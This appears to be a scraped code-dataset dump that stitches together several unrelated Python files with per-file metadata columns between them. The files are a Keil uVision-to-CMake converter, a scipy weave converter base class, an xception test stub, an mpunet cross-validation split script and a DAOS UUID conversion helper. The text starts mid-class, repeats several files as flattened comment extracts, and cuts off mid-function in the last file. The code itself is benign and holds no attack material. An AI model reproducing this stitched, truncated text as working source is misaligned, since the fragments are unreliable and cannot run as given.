if isinstance(languages, Language):
languages = [languages]
for val in values:
obj = cls._get(where, val)
if comment is not None:
# Add comment to the first value only
obj.comment = comment
comment = None
if languages:
obj.languages.update(languages)
@staticmethod
def _clean_paths(paths: Union[str, Iterable[str]]) -> List[str]:
if isinstance(paths, (str, Path)):
paths = [paths]
return [Path(p).as_posix() for p in map(os.path.normpath, paths)]
def add_include_paths(self, paths: Union[str, Iterable[str]], languages: Union[Language, Collection[Language]],
comment: str = None) -> None:
self._add_values(self.include_paths, self._clean_paths(paths), languages, comment)
def add_defines(self, defines: Union[str, Iterable[str]], languages: Union[Language, Collection[Language]],
comment: str = None) -> None:
self._add_values(self.defines, defines, languages, comment)
def add_undefines(self, undefines: Union[str, Iterable[str]], languages: Union[Language, Collection[Language]],
comment: str = None) -> None:
self._add_values(self.undefines, undefines, languages, comment)
def add_source_files(self, paths: Union[None, str, Iterable[str]],
languages: Union[Language, Collection[Language], None],
comment: str = None, include_in_build: bool = True) -> None:
paths = self._clean_paths(paths)
# If file is not included in the build, comment it
if include_in_build is False:
paths = ["# " + path for path in paths]
self._add_values(self.source_file_paths if languages else self.other_file_paths, paths, languages, comment)
def add_other_files(self, paths: Union[str, Iterable[str]], comment: str = None) -> None:
self.add_source_files(paths, None, comment)
def check_common(self) -> Set[Language]:
"""
Check which properties are common to all language configurations.
:return: Set of all used languages (languages with at least one property)
"""
all_props = (self.include_paths, self.defines, self.undefines, self.source_file_paths)
# Get all of the defined languages used
languages = {lang
for props in all_props
for prop in props
for lang in prop.languages}
for props in all_props:
for prop in props:
prop.common = (prop.languages == languages)
return languages
def __str__(self) -> str:
languages = sorted(self.check_common(), key=operator.attrgetter('value'))
ret_str = [
"# Made with CMake <> uVision project file synchronizer"
"# https://github.com/bojanpotocnik/cmake-uvision-syncer"
]
# Set of the build properties
prop_sets: List[Tuple[str, str, List[CMake.String], str]] = [
("definitions", "DEFINES", self.defines, "-D"),
("un-defines", "UNDEFINES", self.undefines, ""),
("include directories", "INCLUDE_DIRS", self.include_paths, ""),
("source files", "SOURCES", self.source_file_paths, ""),
]
# Set of the language configs per build property
sub_prop_sets: List[Tuple[str, str, Callable[[CMake.String], bool]]] = [
("Common", "COMMON", lambda prop: prop.common),
*((lang.value + " specific", lang.name,
lambda prop, lang_=lang: (not prop.common) and (lang_ in prop.languages))
for lang in languages)
]
def _add_section_files(comment: str, var_name: str, value_iterator: Iterable[CMake.String],
value_prefix: str = "") -> str:
s = (f"# {comment}\n"
f"set({var_name}")
value_str = ''
for value in value_iterator:
if value.comment is not None:
value_str += f"\n\t# {value.comment}"
value_str += f"\n\t{value_prefix}{value.value}"
if len(value_str) is not 0:
return s + value_str + "\n)"
else:
return None
for section_comment, section_var_prefix, section_props, val_prefix in prop_sets:
ss_str = []
for prop_set_comment, var_suffix, filter_fun in sub_prop_sets:
section_files = _add_section_files(
comment=f"{prop_set_comment} {section_comment}",
var_name=f"{section_var_prefix}_{var_suffix}",
value_iterator=filter(filter_fun, section_props),
value_prefix=val_prefix
)
if section_files is not None:
ss_str.append(section_files)
ret_str.append("\n\n".join(ss_str))
other_files = _add_section_files(
comment="Other files",
var_name="OTHER_FILES",
value_iterator=self.other_file_paths
)
if other_files is not None:
ret_str.append(other_files)
return "\n\n\n".join(ret_str)
def main() -> None:
# region Parse arguments
arguments = docopt(__doc__)
project_path: str = arguments["<project>"] or "."
if not os.path.isfile(project_path):
with os.scandir(project_path) as dirs: # type: Iterator[DirEntry]
projects = [de.path for de in dirs if (de.is_file() and (os.path.splitext(de.name)[1] == ".uvprojx"))]
if not projects:
raise FileNotFoundError(f"Could not find any .uvprojx file in '{project_path}'")
elif len(projects) > 1:
# Choose the latest file by modification time.
project_path = max(projects, key=os.path.getmtime)
else:
project_path = projects[0]
project_path = os.path.realpath(project_path)
# endregion Parse arguments
print(f"Using µVision5 Project File '{project_path}'")
# Parse uVision project XML files
uvp = UVisionProject.new(project_path)
# Generate CMake file and populate it with information from uVision project
cmake = CMake()
# Add Assembler properties
cmake.add_include_paths(uvp.targets[0].build.asm.include_paths, Language.ASM)
cmake.add_defines(uvp.targets[0].build.asm.defines, Language.ASM)
cmake.add_undefines(uvp.targets[0].build.asm.undefines, Language.ASM)
# Add C properties
cmake.add_include_paths(uvp.targets[0].build.c.include_paths, Language.C)
cmake.add_defines(uvp.targets[0].build.c.defines, Language.C)
cmake.add_undefines(uvp.targets[0].build.c.undefines, Language.C)
# Add source and other files
for file, lang, comment in uvp.source_files():
cmake.add_source_files(file.path, lang, comment, file.include_in_build)
fp_proj_cmake = os.path.join(os.path.dirname(uvp.project_file_path),
os.path.splitext(os.path.basename(uvp.project_file_path))[0] + ".cmake")
with open(fp_proj_cmake, 'w') as f:
print(cmake, file=f)
print(f"Generated CMake file '{fp_proj_cmake}'")
if __name__ == "__main__":
main()
| en | 0.786815 | Usage: main.py [<project>] Options: <project> Path to the .uvprojx file (Keil® µVision5 Project File). The .uvoptx file (Keil® µVision5 Project Options file) will be located automatically as it shall be adjacent to the .uvprojx file, having the same filename. If this is a directory, .uvprojx is found automatically (if multiple found then the latest changed is chosen). If not provided then the current working directory is chosen as a project directory. C Source file Assembly language file Object file Library file Text Document file Custom file C++ Source file Image file # region XML data structures for Project File TODO: Real meaning unknown. Whether this file is included in the build or ignored. Whether to always build this file. # endregion XML data structures for Project File # region XML data structures for Project Options file Number of the :cls:`Group` this file belongs to. Number of the file (global across all groups). File type as selected in the Options for File ... -> Properties dialog Whether the file is expanded (include file dependencies shown) in the Project Window file browser. Whether this file is included in the build or ignored. Whether to always build this file. Whether this file is part of/managed by the Keil MDK Run-Time Environment (RTE) and therefore read-only. Reference to the instance of this file from the Project File. Group name as shown in the Project Window file browser. Whether the group is expanded (files shown) in the Project Window file browser. Whether this group is part of/managed by the Keil MDK Run-Time Environment (RTE) and therefore read-only. List of files in this group. Reference to the instance of this group from the Project File. # endregion XML data structures for Project Options file # region XML parsing helper functions # endregion XML parsing helper functions # region Project File # endregion Project File # region Project Options Groups of files, as shown in the Project Window file browser. # endregion Project Options # noinspection PyProtectedMember # noinspection PyProtectedMember # region Project File # noinspection PyCallByClass,SpellCheckingInspection # There is always only one package, but using generator is clean and # effective way of creating an inline local variable. # TODO: Delimiter unknown # region RTE # noinspection PyCallByClass,PyTypeChecker # Using generator and list only for local variable # There is always only one package, but using generator is clean and # effective way of creating an inline local variable. # This new instance of package will be replaced below with reference to an actual matching # instance of the package from rte.packages. # TODO: Handle nullable # RTE.TargetInfo.VersionMatchMode(text(ti, "versionMatchMode", True, True)) # TODO # TODO # TODO: Connect actual references of the rte.packages and rte.packages.target_infos # Temporally remove target_infos to enable usage of equality operator. # endregion RTE # endregion Project File # region Project Options # Find this group in the Project File # Find all files in this group and also in the Project File # There is no more *currently relevant* data in the Project Options file. # endregion Project Options # Add RTE files to the file groups to actually match the Project Window file browser. # Find the group to which this file belongs to (there shall be one and only one). # Detect file type (this information is not provided for RTE files) # TODO: This information is available for RTE files # TODO # TODO Get all files grouped by the file type with group names as a comments. # Add source files # RTE groups start with double colon (::). # Group files by type and add one comment for every file type as they are in the separate sections. The actual string value. Set of all build configs in which this value is present. Comment which will be added to the line before Get existing object from the list or append a new one to the end. # noinspection PyTypeChecker # noinspection PyCallByClass # Add comment to the first value only # If file is not included in the build, comment it Check which properties are common to all language configurations. :return: Set of all used languages (languages with at least one property) # Get all of the defined languages used # Set of the build properties # Set of the language configs per build property # {value.comment}" # region Parse arguments # type: Iterator[DirEntry] # Choose the latest file by modification time. # endregion Parse arguments # Parse uVision project XML files # Generate CMake file and populate it with information from uVision project # Add Assembler properties # Add C properties # Add source and other files | 2.892172 | 3 |
scipy/weave/base_spec.py | lesserwhirls/scipy-cwt | 8 | 8555 | <filename>scipy/weave/base_spec.py
class base_converter(object):
"""
Properties:
headers -- list of strings that name the header files needed by this
object.
include_dirs -- list of directories where the header files can be found.
libraries -- list of libraries needed to link to when compiling
extension.
library_dirs -- list of directories to search for libraries.
support_code -- list of strings. Each string is a subroutine needed
by the type. Functions that are used in the conversion
between Python and C++ files are examples of these.
Methods:
type_match(value) returns 1 if this class is used to represent type
specification for value.
type_spec(name, value) returns a new object (of this class) that is
used to produce C++ code for value.
declaration_code() returns C++ code fragment for type declaration and
conversion of python object to C++ object.
cleanup_code() returns C++ code fragment for cleaning up after the
variable after main C++ code fragment has executed.
"""
_build_information = []
compiler = ''
def set_compiler(self,compiler):
self.compiler = compiler
def type_match(self,value):
raise NotImplementedError("You must override method in derived class")
def build_information(self):
return self._build_information
def type_spec(self,name,value):
pass
def declaration_code(self,templatize = 0):
return ""
def local_dict_code(self):
return ""
def cleanup_code(self):
return ""
def retrieve_py_variable(self,inline=0):
# this needs a little coordination in name choices with the
# ext_inline_function class.
if inline:
vn = 'get_variable("%s",raw_locals,raw_globals)' % self.name
else:
vn = 'py_' + self.name
return vn
def py_reference(self):
return "&py_" + self.name
def py_pointer(self):
return "*py_" + self.name
def py_variable(self):
return "py_" + self.name
def reference(self):
return "&" + self.name
def pointer(self):
return "*" + self.name
def init_flag(self):
return self.name + "_used"
def variable(self):
return self.name
def variable_as_string(self):
return '"' + self.name + '"'
import UserList
import base_info
class arg_spec_list(UserList.UserList):
def build_information(self):
all_info = base_info.info_list()
for i in self:
all_info.extend(i.build_information())
return all_info
def py_references(self):
return map(lambda x: x.py_reference(),self)
def py_pointers(self):
return map(lambda x: x.py_pointer(),self)
def py_variables(self):
return map(lambda x: x.py_variable(),self)
def references(self):
return map(lambda x: x.py_reference(),self)
def pointers(self):
return map(lambda x: x.pointer(),self)
def variables(self):
return map(lambda x: x.variable(),self)
def init_flags(self):
return map(lambda x: x.init_flag(),self)
def variable_as_strings(self):
return map(lambda x: x.variable_as_string(),self)
| <filename>scipy/weave/base_spec.py
class base_converter(object):
"""
Properties:
headers -- list of strings that name the header files needed by this
object.
include_dirs -- list of directories where the header files can be found.
libraries -- list of libraries needed to link to when compiling
extension.
library_dirs -- list of directories to search for libraries.
support_code -- list of strings. Each string is a subroutine needed
by the type. Functions that are used in the conversion
between Python and C++ files are examples of these.
Methods:
type_match(value) returns 1 if this class is used to represent type
specification for value.
type_spec(name, value) returns a new object (of this class) that is
used to produce C++ code for value.
declaration_code() returns C++ code fragment for type declaration and
conversion of python object to C++ object.
cleanup_code() returns C++ code fragment for cleaning up after the
variable after main C++ code fragment has executed.
"""
_build_information = []
compiler = ''
def set_compiler(self,compiler):
self.compiler = compiler
def type_match(self,value):
raise NotImplementedError("You must override method in derived class")
def build_information(self):
return self._build_information
def type_spec(self,name,value):
pass
def declaration_code(self,templatize = 0):
return ""
def local_dict_code(self):
return ""
def cleanup_code(self):
return ""
def retrieve_py_variable(self,inline=0):
# this needs a little coordination in name choices with the
# ext_inline_function class.
if inline:
vn = 'get_variable("%s",raw_locals,raw_globals)' % self.name
else:
vn = 'py_' + self.name
return vn
def py_reference(self):
return "&py_" + self.name
def py_pointer(self):
return "*py_" + self.name
def py_variable(self):
return "py_" + self.name
def reference(self):
return "&" + self.name
def pointer(self):
return "*" + self.name
def init_flag(self):
return self.name + "_used"
def variable(self):
return self.name
def variable_as_string(self):
return '"' + self.name + '"'
import UserList
import base_info
class arg_spec_list(UserList.UserList):
def build_information(self):
all_info = base_info.info_list()
for i in self:
all_info.extend(i.build_information())
return all_info
def py_references(self):
return map(lambda x: x.py_reference(),self)
def py_pointers(self):
return map(lambda x: x.py_pointer(),self)
def py_variables(self):
return map(lambda x: x.py_variable(),self)
def references(self):
return map(lambda x: x.py_reference(),self)
def pointers(self):
return map(lambda x: x.pointer(),self)
def variables(self):
return map(lambda x: x.variable(),self)
def init_flags(self):
return map(lambda x: x.init_flag(),self)
def variable_as_strings(self):
return map(lambda x: x.variable_as_string(),self)
| en | 0.778711 | Properties: headers -- list of strings that name the header files needed by this object. include_dirs -- list of directories where the header files can be found. libraries -- list of libraries needed to link to when compiling extension. library_dirs -- list of directories to search for libraries. support_code -- list of strings. Each string is a subroutine needed by the type. Functions that are used in the conversion between Python and C++ files are examples of these. Methods: type_match(value) returns 1 if this class is used to represent type specification for value. type_spec(name, value) returns a new object (of this class) that is used to produce C++ code for value. declaration_code() returns C++ code fragment for type declaration and conversion of python object to C++ object. cleanup_code() returns C++ code fragment for cleaning up after the variable after main C++ code fragment has executed. # this needs a little coordination in name choices with the # ext_inline_function class. | 2.922301 | 3 |
xception/test.py | latentai/model-zoo-models | 8 | 8556 | <filename>xception/test.py
#!/usr/bin/env python3
from utils.model_config_helpers import run_model_test
run_model_test()
| <filename>xception/test.py
#!/usr/bin/env python3
from utils.model_config_helpers import run_model_test
run_model_test()
| fr | 0.221828 | #!/usr/bin/env python3 | 1.35047 | 1 |
mpunet/bin/cv_split.py | alexsosn/MultiPlanarUNet | 0 | 8557 | <filename>mpunet/bin/cv_split.py
from glob import glob
import sys
import os
import numpy as np
import random
from mpunet.utils import create_folders
import argparse
def get_parser():
parser = argparse.ArgumentParser(description="Prepare a data folder for a"
"CV experiment setup.")
parser.add_argument("--data_dir", type=str,
help="Path to data directory")
parser.add_argument("--CV", type=int, default=5,
help="Number of splits (default=5)")
parser.add_argument("--out_dir", type=str, default="views",
help="Directory to store CV subfolders "
"(default=views")
parser.add_argument("--im_sub_dir", type=str, default="images",
help="Subfolder under 'data_dir' in which image are "
"stored (default=images)")
parser.add_argument("--lab_sub_dir", type=str, default="labels",
help="Subfolder under 'data_dir' in which labels are "
"stored (default=labels)")
parser.add_argument("--copy", action="store_true",
help="Copy files to CV-subfolders instead of "
"symlinking (not recommended)")
parser.add_argument("--file_list", action="store_true",
help="Create text files with paths pointing to the "
"images at the image and labels subdirs under "
"each split instead of symlink/copying. This is"
" usefull on systems were symlink is not "
"supported, but the dataset size is too large to"
" store in copies. NOTE: Only one of --copy and "
"--file_list flags must be set.")
parser.add_argument("--file_regex", type=str, default="*.nii*",
help="Regex used to select files from the image "
"and labels subdirs. (default='*.nii*')")
parser.add_argument("--validation_fraction", type=float, default=0.20,
help="Fraction of OVERALL data size used for "
"validation in each split. In a 5-CV setting with "
"N=100 and val_frac=0.20, each split will have "
"N_train=60, N_val=20 and N_test=20 images")
parser.add_argument("--test_fraction", type=float, default=0.20,
help="Fraction of data size used for test if CV=1.")
parser.add_argument("--common_prefix_length", type=int, required=False, default=0)
return parser
def assert_dir_structure(data_dir, im_dir, lab_dir, out_dir):
for _dir in (data_dir, im_dir, lab_dir):
if not os.path.exists(_dir):
raise OSError("Invalid data directory '%s'. Does not exist." % data_dir)
if os.path.exists(out_dir):
raise OSError("Output directory at '%s' already exists." % out_dir)
def create_view_folders(out_dir, n_splits):
if not os.path.exists(out_dir):
print("Creating directory at %s" % out_dir)
os.makedirs(out_dir)
if n_splits > 1:
for i in range(n_splits):
split_dir = os.path.join(out_dir, "split_%i" % i)
print("Creating directory at %s" % split_dir)
os.mkdir(split_dir)
def pair_by_names(images, common_prefix_length):
if common_prefix_length == 0:
return images
from collections import defaultdict
names = [os.path.split(i)[-1][:common_prefix_length] for i in images]
inds = defaultdict(list)
for i, item in enumerate(names):
inds[item].append(i)
pairs = inds.values()
return [tuple(np.array(images)[i]) for i in pairs]
def add_images(images, im_folder_path, label_folder_path, im_dir, lab_dir,
link_func=os.symlink):
for image in images:
if not isinstance(image, (list, tuple, np.ndarray)):
image = (image,)
for im in image:
# Get file name
file_name = os.path.split(im)[-1]
# Get label path (OBS: filenames must match!)
lab = im.replace(im_dir, lab_dir)
if not os.path.exists(lab):
raise OSError("No label file found at '%s'. OBS: image and "
"label files must have exactly the same name. "
"Images should be located at '%s' and labels at"
" '%s'" % (lab, im_folder_path, label_folder_path))
# Get relative paths
rel_image = os.path.relpath(im, im_folder_path)
rel_label = os.path.relpath(lab, label_folder_path)
# Symlink or copy
link_func(rel_image, im_folder_path + "/%s" % file_name)
link_func(rel_label, label_folder_path + "/%s" % file_name)
def _add_to_file_list_fallback(rel_image_path, image_path,
fname="LIST_OF_FILES.txt"):
"""
On some system synlinks are not supported, if --files_list flag is set,
uses this function to add each absolute file path to a list at the final
subfolder that is supposed to store images and label links or actual files
At run-time, these files must be loaded by reading in the path from these
files instead.
"""
# Get folder where list of files should be stored
folder = os.path.split(image_path)[0]
# Get absolute path to image
# We change dir to get the correct abs path from the relative
os.chdir(folder)
abs_file_path = os.path.abspath(rel_image_path)
# Get path to the list of files
list_file_path = os.path.join(folder, fname)
with open(list_file_path, "a") as out_f:
out_f.write(abs_file_path + "\n")
def entry_func(args=None):
# Get parser
parser = vars(get_parser().parse_args(args))
# Get arguments
data_dir = os.path.abspath(parser["data_dir"])
n_splits = int(parser["CV"])
if n_splits > 1:
out_dir = os.path.join(data_dir, parser["out_dir"], "%i_CV" % n_splits)
else:
out_dir = os.path.join(data_dir, parser["out_dir"], "fixed_split")
im_dir = os.path.join(data_dir, parser["im_sub_dir"])
lab_dir = os.path.join(data_dir, parser["lab_sub_dir"])
copy = parser["copy"]
file_list = parser["file_list"]
regex = parser["file_regex"]
val_frac = parser["validation_fraction"]
test_frac = parser["test_fraction"]
common_prefix_length = parser["common_prefix_length"]
if n_splits == 1 and not test_frac:
raise ValueError("Must specify --test_fraction with --CV=1.")
if copy and file_list:
raise ValueError("Only one of --copy and --file_list "
"flags must be set.")
# Assert suitable folders
assert_dir_structure(data_dir, im_dir, lab_dir, out_dir)
# Create sub-folders
create_view_folders(out_dir, n_splits)
# Get images and pair by subject identifier if common_prefix_length > 0
images = glob(os.path.join(im_dir, regex))
images = pair_by_names(images, common_prefix_length)
print("-----")
print("Found {} images".format(len(images)))
# Get validation size
N_total = len(images)
if n_splits > 1:
N_test = N_total // n_splits
else:
N_test = int(np.ceil(N_total * test_frac))
N_val = int(np.ceil(N_total * val_frac))
if N_val + N_test >= N_total:
raise ValueError("Too large validation_fraction - "
"No training samples left!")
N_train = N_total - N_test - N_val
print("Total images:".ljust(40), N_total)
print("Train images pr. split:".ljust(40), N_train)
print("Validation images pr. split:".ljust(40), N_val)
print("Test images pr. split:".ljust(40), N_test)
# Shuffle and split the images into CV parts
random.shuffle(images)
splits = np.array_split(images, n_splits)
# Symlink / copy files
for i, split in enumerate(splits):
print(" Split %i/%i" % (i+1, n_splits), end="\r", flush=True)
# Set root path to split folder
if n_splits > 1:
split_path = os.path.join(out_dir, "split_%i" % i)
else:
split_path = out_dir
# Here we kind of hacky force the following code to work with CV=1
# Define a test set and overwrite the current split (which stores
# add the data, as splits was never split with n_splits=1
split = splits[0][:N_test]
# Overwrite the splits variable to a length 2 array with the
# remaining data which will be used as val+train. The loop still
# refers to the old split and thus will only execute once
splits = [split, splits[0][N_test:]]
# Define train, val and test sub-dirs
train_path = os.path.join(split_path, "train")
train_im_path = os.path.join(train_path, parser["im_sub_dir"])
train_label_path = os.path.join(train_path, parser["lab_sub_dir"])
if N_val:
val_path = os.path.join(split_path, "val")
val_im_path = os.path.join(val_path, parser["im_sub_dir"])
val_label_path = os.path.join(val_path, parser["lab_sub_dir"])
else:
val_path, val_im_path, val_label_path = (None,) * 3
test_path = os.path.join(split_path, "test")
test_im_path = os.path.join(test_path, parser["im_sub_dir"])
test_label_path = os.path.join(test_path, parser["lab_sub_dir"])
# Create folders if not existing
create_folders([train_path, val_path, train_im_path, train_label_path,
val_im_path, val_label_path, test_path, test_im_path,
test_label_path])
# Copy or symlink?
if copy:
from shutil import copyfile
move_func = copyfile
elif file_list:
move_func = _add_to_file_list_fallback
else:
move_func = os.symlink
# Add test data to test folder
add_images(split, test_im_path, test_label_path, im_dir, lab_dir, move_func)
# Join remaining splits into train+val
remaining = [x for ind, x in enumerate(splits) if ind != i]
remaining = [item for sublist in remaining for item in sublist]
# Extract validation data from the remaining
random.shuffle(remaining)
validation = remaining[:N_val]
training = remaining[N_val:]
# Add
if validation:
add_images(validation, val_im_path, val_label_path, im_dir, lab_dir, move_func)
add_images(training, train_im_path, train_label_path, im_dir, lab_dir, move_func)
if __name__ == "__main__":
entry_func()
| <filename>mpunet/bin/cv_split.py
from glob import glob
import sys
import os
import numpy as np
import random
from mpunet.utils import create_folders
import argparse
def get_parser():
parser = argparse.ArgumentParser(description="Prepare a data folder for a"
"CV experiment setup.")
parser.add_argument("--data_dir", type=str,
help="Path to data directory")
parser.add_argument("--CV", type=int, default=5,
help="Number of splits (default=5)")
parser.add_argument("--out_dir", type=str, default="views",
help="Directory to store CV subfolders "
"(default=views")
parser.add_argument("--im_sub_dir", type=str, default="images",
help="Subfolder under 'data_dir' in which image are "
"stored (default=images)")
parser.add_argument("--lab_sub_dir", type=str, default="labels",
help="Subfolder under 'data_dir' in which labels are "
"stored (default=labels)")
parser.add_argument("--copy", action="store_true",
help="Copy files to CV-subfolders instead of "
"symlinking (not recommended)")
parser.add_argument("--file_list", action="store_true",
help="Create text files with paths pointing to the "
"images at the image and labels subdirs under "
"each split instead of symlink/copying. This is"
" usefull on systems were symlink is not "
"supported, but the dataset size is too large to"
" store in copies. NOTE: Only one of --copy and "
"--file_list flags must be set.")
parser.add_argument("--file_regex", type=str, default="*.nii*",
help="Regex used to select files from the image "
"and labels subdirs. (default='*.nii*')")
parser.add_argument("--validation_fraction", type=float, default=0.20,
help="Fraction of OVERALL data size used for "
"validation in each split. In a 5-CV setting with "
"N=100 and val_frac=0.20, each split will have "
"N_train=60, N_val=20 and N_test=20 images")
parser.add_argument("--test_fraction", type=float, default=0.20,
help="Fraction of data size used for test if CV=1.")
parser.add_argument("--common_prefix_length", type=int, required=False, default=0)
return parser
def assert_dir_structure(data_dir, im_dir, lab_dir, out_dir):
for _dir in (data_dir, im_dir, lab_dir):
if not os.path.exists(_dir):
raise OSError("Invalid data directory '%s'. Does not exist." % data_dir)
if os.path.exists(out_dir):
raise OSError("Output directory at '%s' already exists." % out_dir)
def create_view_folders(out_dir, n_splits):
if not os.path.exists(out_dir):
print("Creating directory at %s" % out_dir)
os.makedirs(out_dir)
if n_splits > 1:
for i in range(n_splits):
split_dir = os.path.join(out_dir, "split_%i" % i)
print("Creating directory at %s" % split_dir)
os.mkdir(split_dir)
def pair_by_names(images, common_prefix_length):
if common_prefix_length == 0:
return images
from collections import defaultdict
names = [os.path.split(i)[-1][:common_prefix_length] for i in images]
inds = defaultdict(list)
for i, item in enumerate(names):
inds[item].append(i)
pairs = inds.values()
return [tuple(np.array(images)[i]) for i in pairs]
def add_images(images, im_folder_path, label_folder_path, im_dir, lab_dir,
link_func=os.symlink):
for image in images:
if not isinstance(image, (list, tuple, np.ndarray)):
image = (image,)
for im in image:
# Get file name
file_name = os.path.split(im)[-1]
# Get label path (OBS: filenames must match!)
lab = im.replace(im_dir, lab_dir)
if not os.path.exists(lab):
raise OSError("No label file found at '%s'. OBS: image and "
"label files must have exactly the same name. "
"Images should be located at '%s' and labels at"
" '%s'" % (lab, im_folder_path, label_folder_path))
# Get relative paths
rel_image = os.path.relpath(im, im_folder_path)
rel_label = os.path.relpath(lab, label_folder_path)
# Symlink or copy
link_func(rel_image, im_folder_path + "/%s" % file_name)
link_func(rel_label, label_folder_path + "/%s" % file_name)
def _add_to_file_list_fallback(rel_image_path, image_path,
fname="LIST_OF_FILES.txt"):
"""
On some system synlinks are not supported, if --files_list flag is set,
uses this function to add each absolute file path to a list at the final
subfolder that is supposed to store images and label links or actual files
At run-time, these files must be loaded by reading in the path from these
files instead.
"""
# Get folder where list of files should be stored
folder = os.path.split(image_path)[0]
# Get absolute path to image
# We change dir to get the correct abs path from the relative
os.chdir(folder)
abs_file_path = os.path.abspath(rel_image_path)
# Get path to the list of files
list_file_path = os.path.join(folder, fname)
with open(list_file_path, "a") as out_f:
out_f.write(abs_file_path + "\n")
def entry_func(args=None):
# Get parser
parser = vars(get_parser().parse_args(args))
# Get arguments
data_dir = os.path.abspath(parser["data_dir"])
n_splits = int(parser["CV"])
if n_splits > 1:
out_dir = os.path.join(data_dir, parser["out_dir"], "%i_CV" % n_splits)
else:
out_dir = os.path.join(data_dir, parser["out_dir"], "fixed_split")
im_dir = os.path.join(data_dir, parser["im_sub_dir"])
lab_dir = os.path.join(data_dir, parser["lab_sub_dir"])
copy = parser["copy"]
file_list = parser["file_list"]
regex = parser["file_regex"]
val_frac = parser["validation_fraction"]
test_frac = parser["test_fraction"]
common_prefix_length = parser["common_prefix_length"]
if n_splits == 1 and not test_frac:
raise ValueError("Must specify --test_fraction with --CV=1.")
if copy and file_list:
raise ValueError("Only one of --copy and --file_list "
"flags must be set.")
# Assert suitable folders
assert_dir_structure(data_dir, im_dir, lab_dir, out_dir)
# Create sub-folders
create_view_folders(out_dir, n_splits)
# Get images and pair by subject identifier if common_prefix_length > 0
images = glob(os.path.join(im_dir, regex))
images = pair_by_names(images, common_prefix_length)
print("-----")
print("Found {} images".format(len(images)))
# Get validation size
N_total = len(images)
if n_splits > 1:
N_test = N_total // n_splits
else:
N_test = int(np.ceil(N_total * test_frac))
N_val = int(np.ceil(N_total * val_frac))
if N_val + N_test >= N_total:
raise ValueError("Too large validation_fraction - "
"No training samples left!")
N_train = N_total - N_test - N_val
print("Total images:".ljust(40), N_total)
print("Train images pr. split:".ljust(40), N_train)
print("Validation images pr. split:".ljust(40), N_val)
print("Test images pr. split:".ljust(40), N_test)
# Shuffle and split the images into CV parts
random.shuffle(images)
splits = np.array_split(images, n_splits)
# Symlink / copy files
for i, split in enumerate(splits):
print(" Split %i/%i" % (i+1, n_splits), end="\r", flush=True)
# Set root path to split folder
if n_splits > 1:
split_path = os.path.join(out_dir, "split_%i" % i)
else:
split_path = out_dir
# Here we kind of hacky force the following code to work with CV=1
# Define a test set and overwrite the current split (which stores
# add the data, as splits was never split with n_splits=1
split = splits[0][:N_test]
# Overwrite the splits variable to a length 2 array with the
# remaining data which will be used as val+train. The loop still
# refers to the old split and thus will only execute once
splits = [split, splits[0][N_test:]]
# Define train, val and test sub-dirs
train_path = os.path.join(split_path, "train")
train_im_path = os.path.join(train_path, parser["im_sub_dir"])
train_label_path = os.path.join(train_path, parser["lab_sub_dir"])
if N_val:
val_path = os.path.join(split_path, "val")
val_im_path = os.path.join(val_path, parser["im_sub_dir"])
val_label_path = os.path.join(val_path, parser["lab_sub_dir"])
else:
val_path, val_im_path, val_label_path = (None,) * 3
test_path = os.path.join(split_path, "test")
test_im_path = os.path.join(test_path, parser["im_sub_dir"])
test_label_path = os.path.join(test_path, parser["lab_sub_dir"])
# Create folders if not existing
create_folders([train_path, val_path, train_im_path, train_label_path,
val_im_path, val_label_path, test_path, test_im_path,
test_label_path])
# Copy or symlink?
if copy:
from shutil import copyfile
move_func = copyfile
elif file_list:
move_func = _add_to_file_list_fallback
else:
move_func = os.symlink
# Add test data to test folder
add_images(split, test_im_path, test_label_path, im_dir, lab_dir, move_func)
# Join remaining splits into train+val
remaining = [x for ind, x in enumerate(splits) if ind != i]
remaining = [item for sublist in remaining for item in sublist]
# Extract validation data from the remaining
random.shuffle(remaining)
validation = remaining[:N_val]
training = remaining[N_val:]
# Add
if validation:
add_images(validation, val_im_path, val_label_path, im_dir, lab_dir, move_func)
add_images(training, train_im_path, train_label_path, im_dir, lab_dir, move_func)
if __name__ == "__main__":
entry_func()
| en | 0.833502 | # Get file name # Get label path (OBS: filenames must match!) # Get relative paths # Symlink or copy On some system synlinks are not supported, if --files_list flag is set, uses this function to add each absolute file path to a list at the final subfolder that is supposed to store images and label links or actual files At run-time, these files must be loaded by reading in the path from these files instead. # Get folder where list of files should be stored # Get absolute path to image # We change dir to get the correct abs path from the relative # Get path to the list of files # Get parser # Get arguments # Assert suitable folders # Create sub-folders # Get images and pair by subject identifier if common_prefix_length > 0 # Get validation size # Shuffle and split the images into CV parts # Symlink / copy files # Set root path to split folder # Here we kind of hacky force the following code to work with CV=1 # Define a test set and overwrite the current split (which stores # add the data, as splits was never split with n_splits=1 # Overwrite the splits variable to a length 2 array with the # remaining data which will be used as val+train. The loop still # refers to the old split and thus will only execute once # Define train, val and test sub-dirs # Create folders if not existing # Copy or symlink? # Add test data to test folder # Join remaining splits into train+val # Extract validation data from the remaining # Add | 2.946126 | 3 |
src/client/pydaos/raw/conversion.py | gczsjdy/daos | 1 | 8558 | #!/usr/bin/python
"""
(C) Copyright 2018 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Government's rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
"""
import ctypes
import uuid
def c_uuid_to_str(uuid):
""" utility function to convert a C uuid into a standard string format """
uuid_str = '{:02X}{:02X}{:02X}{:02X}-{:02X}{:02X}-{:02X}{:02X}-{:02X}'\
'{:02X}-{:02X}{:02X}{:02X}{:02X}{:02X}{:02X}'.format(
uuid[0], uuid[1], uuid[2], uuid[3], uuid[4], uuid[5],
uuid[6], uuid[7], uuid[8], uuid[9], uuid[10], uuid[11],
uuid[12], uuid[13], uuid[14], uuid[15])
return uuid_str
def c_uuid(p_uuid, c_uuid):
""" utility function to create a UUID in C format from a python UUID """
hexstr = p_uuid.hex
for i in range(0, 31, 2):
c_uuid[int(i/2)] = int(hexstr[i:i+2], 16)
def str_to_c_uuid(uuidstr):
""" utility function to convert string format uuid to a C uuid """
uuidstr2 = '{' + uuidstr + '}'
puuid = uuid.UUID(uuidstr2)
cuuid = (ctypes.c_ubyte * 16)()
